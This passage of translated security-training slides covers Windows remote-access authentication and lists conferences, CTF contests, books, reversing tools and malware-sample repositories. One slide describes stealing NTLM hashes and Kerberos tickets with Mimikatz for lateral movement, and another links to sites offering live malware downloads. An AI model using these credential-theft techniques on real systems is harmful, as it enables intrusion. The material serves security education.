  148. > • In terms of Events, Remote Access is usually divided into "connection established", "authentication" and "logon"
    • Authentication is authorised either by account/password alone or by account/password plus a Token
    • A SmartCard is one way of supplying the Token; the other two authentication methods are NTLM and Kerberos
    • A SmartCard left connected for a long time without being removed lets a remote HelpDesk admin steal the Token
    • Attackers can use Mimikatz to steal NTLM Hashes to run WRM, WMIC, PSEXEC
    • Attackers can use Mimikatz to steal the machine Hash and have the DC issue a Kerberos Ticket that passes Kerberos authentication
      .#####.   mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
     ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
     '## v ##'       Vincent LE TOUX             ( [email protected] )
      '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
  149. > Real Network Forces
    • USA: NSA
    • China: APT3 (a.k.a. Gothic Panda)
    • Russia: APT28 (Hillary Clinton campaign)
    • Vietnam: APT32 (a.k.a. SeaLotus, Toyota global incident)
    • TW: 資通電軍 (Information, Communication and Electronic Force Command), 調查局資訊科學組 (Investigation Bureau Information Science Section), 國安局資訊組 (National Security Bureau Information Section)
  150. > Domestic security conferences
    • HITCON CMT
    • HITCON Pacific
    • TDoH conf
    • DEVCORE conf (selective admission)
    • 國際資訊安全組織台灣高峰會 (Taiwan summit of the international information-security organisations)
    • iThome資安大會 (iThome CyberSec)
    Foreign security conferences
    • SECCON (JP)
    • CodeBlue (JP)
    • CCC (GM)
    • DEFCON (US)
    • BlackHat (Global: USA, Asia, China, Europe)
    Domestic technical conferences
    • COSCUP
    • SITCON
    • MOPCON
    • PYCON TW
    • RubyCON
    • JSDC
    • RedHat Taiwan
    • Symantec Taiwan
    • DevOpsDaysAsia Taipei
    • vForumTW
  151. > • Ministry of Education AIS3 summer training camp (教育部 AIS3 暑期訓練營)
      – Modelled on Korea’s BoB security training camp; an online pre-test selects the top 180 for the training list; limited to students enrolled in Taiwan
    • 臺灣好厲駭 annual individual mentoring program
      – 1:1 mentoring; mentors are mostly chroot members, professors or well-known hackers; limited to students enrolled in Taiwan
    • NCSIST AEGIS (中科院 AEGIS)
      – The first edition’s challenges were rather guess-heavy; recently that style has been swept away, and extremely difficult but well-structured challenges (especially Pwn) must be solved within 8 hours; even Misc1 was a super-hybrid mixing five common techniques into one challenge
    • Golden Shield Cup security competition (金盾盃資安競賽)
      – Multiple-choice pre-test for initial screening, KoF as the final; one of the few non-Jeopardy competitions; limited to students enrolled in Taiwan
    • NCHC IoT competition (國網 IoT 競賽)
      – Tests released or unreleased physical products, challenging assessment, proof-of-finding and report-writing skills
    • NCHC Red Alert 72 (國網 Red Alert 72)
      – Defense-focused competition, with a little Jeopardy for base points
    • HITCON CTF
      – Taiwan’s most authoritative security competition, one of the handful of authoritative competitions worldwide, and a qualifier for the DEFCON world finals. All online Jeopardy; global team scores and scheduled competitions
    • TrendMicro CTF
      – HITCON CTF qualifier
    • AIS3 EoF
      – AIS3’s year-end carnival competition; its predecessor AIS3 Final was a HITCON CTF qualifier
    • MyFirstCTF
      – CTF suited to high-school and vocational students; mostly variations on past problems
    • BreakAll-CTF
      – CTF suited to high-school and vocational students; mostly variations on past problems
  152. > • WikiPedia x86 / x86_calling_conventions / x86…
    • Wikibooks x86 Assembly
    • 看雪論壇 (Pediy forum) article collection 【加密與解密】
    • 【The Shellcoders Handbook】【Hacking: The Art of Exploitation】
    • WriteUps on CTFtime about Pwn and Reversing
    • Online PWN CTF
      – Pwn.kr practice site (from easy to hard), Pwn.tw classic problem collection, OverTheWire
    • Online Reversing CTF
      – RingZer0team/Reversing
    • 52pojie tool recommendations, plugin recommendations and highlighted articles
    • TalkSlides:
      – AngelBoy1 (HITCON 217), SeanWu (HITCON 217), aaaddress1 (TDoH), AsukNakajima (SECCON), VinceChen (MTK), ss8654twtw (BFKinesiS), frozenkp (BambooFox)
  153. > • HackerPlayBook v2
    • HackerPlayBook v3
    • Kali Linux 滲透測試工具 第二版 (Kali Linux Penetration Testing Tools, 2nd edition)
    • 白帽子講Web安全 (White Hat Talks Web Security)
    • The Browser Hacker’s Handbook (駭客攻防聖經)
    • Windows Internals, System architecture, processes, threads, memory management, and more, 6/e
    • Windows Internals, System architecture, processes, threads, memory management, and more, 7/e
  154. > Static Reversing
    • IDA pro
    • Ghidra
    • Snowman
    • Hopper
    Dynamic Debugger
    • Ollydbg
    • CheatEngine
    MetaData
    • ExifTool
    • Peview
    • Petool
    • Winhex
    • HexWorkshop
    • WinHex
    • Stud_PE
    UnPacker
    • PEiD
    Dynamic Logger
    • Elasticsearch + Moloch
    • MITM Proxy
    • TCPViewer
    • Nirsoft TCPLogView (has log)
    • Procexpa
    • MemMon
    • Vmmap
    • DPerfLite
    • IRPMon
    • SdtViewer
  155. > • ANY.RUN: https://app.any.run/submissions
    • Contagio Malware Dump: http://contagiodump.blogspot.com/
    • Das Malwerk: http://dasmalwerk.eu/
    • Hybrid Analysis: https://www.hybrid-analysis.com/
    • KernelMode.info: http://www.kernelmode.info/forum/viewforum.php?f=16
    • MalShare: http://malshare.com/
    • Malware.lu’s AVCaesar: http://avcaesar.malware.lu/
    • malware-traffic-analysis.net: https://www.malware-traffic-analysis.net/
    • Objective-See Collection: https://objective-see.com/malware.html
    • PacketTotal: https://packettotal.com/malware-archive.html
    • SNDBOX: https://app.sndbox.com/
    • theZoo: https://thezoo.morirt.com/
    • VirusBay: https://beta.virusbay.io/
    • VirusShare: http://virusshare.com/
    • Virusign: http://www.virusign.com/
    • VirusSign: https://www.virussign.com/downloads.html
  156. > Books:
    • Security for Web Developers – John Paul Mueller
    • 加密與解密 (Encryption and Decryption) – 段剛 (Duan Gang)
    • HackerPlayBook v2
    • HackerPlayBook v3
    • Kali Linux 滲透測試工具 第二版 (Kali Linux Penetration Testing Tools, 2nd edition)
    • 白帽子講Web安全 (White Hat Talks Web Security)
    • The Browser Hacker’s Handbook (駭客攻防聖經)
    • Mastering Metasploit – Nipun Jaswal
    Websites:
    • OWASP
    • Mitre ATT&CK
    • HackTheBox
    • Vulnhub
    • XSS game
    • Lord-of-SQLinjection
    • Pwnable.kr
    • Sucuri
  157. • Penetration Test
    • Anti-Virus Driver
    • Sandbox
    • Secure Compiler
    • Fuzzing Test
    • Symbolic Execution
    • Android Kernel
    • Linux Kernel
    • CAN Bus